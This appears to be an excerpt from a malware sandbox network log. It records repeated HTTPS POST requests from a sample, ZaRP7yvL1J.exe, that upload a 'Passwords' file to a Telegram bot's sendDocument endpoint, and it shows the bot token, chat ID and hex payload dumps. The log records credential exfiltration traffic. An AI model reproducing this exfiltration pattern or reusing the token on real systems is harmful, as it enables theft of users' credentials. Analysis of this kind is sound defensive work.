                                                                                                          2025-01-11 06:32:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 37 37 35 32 36 61 65 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31f77526aea5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:05 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:05 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:05 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44887,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577125,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449996149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:06 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd320c50c52ce9
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 63 35 30 63 35 32 63 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd320c50c52ce9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:06 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:06 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:06 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44888,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577126,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.450007149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:08 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd321fbad14072
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 06:32:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 66 62 61 64 31 34 30 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd321fbad14072Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:08 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:08 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:08 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44889,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577128,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.450016149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:11 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3240e3413414
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 06:32:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 30 65 33 34 31 33 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3240e3413414Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:11 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:11 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:11 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44890,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577131,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.450018149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:12 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3255893946b1
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 06:32:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 35 38 39 33 39 34 36 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3255893946b1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:12 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:12 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:12 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44891,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577132,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.450020149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:15 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd327ea937c2a5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 06:32:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 65 61 39 33 37 63 32 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd327ea937c2a5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:16 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:16 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44892,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577136,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.450022149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:17 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3293232591dd
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 06:32:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 33 32 33 32 35 39 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3293232591ddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:17 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:17 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:17 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44893,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577137,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.450024149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:20 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32b9327f2f0c
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
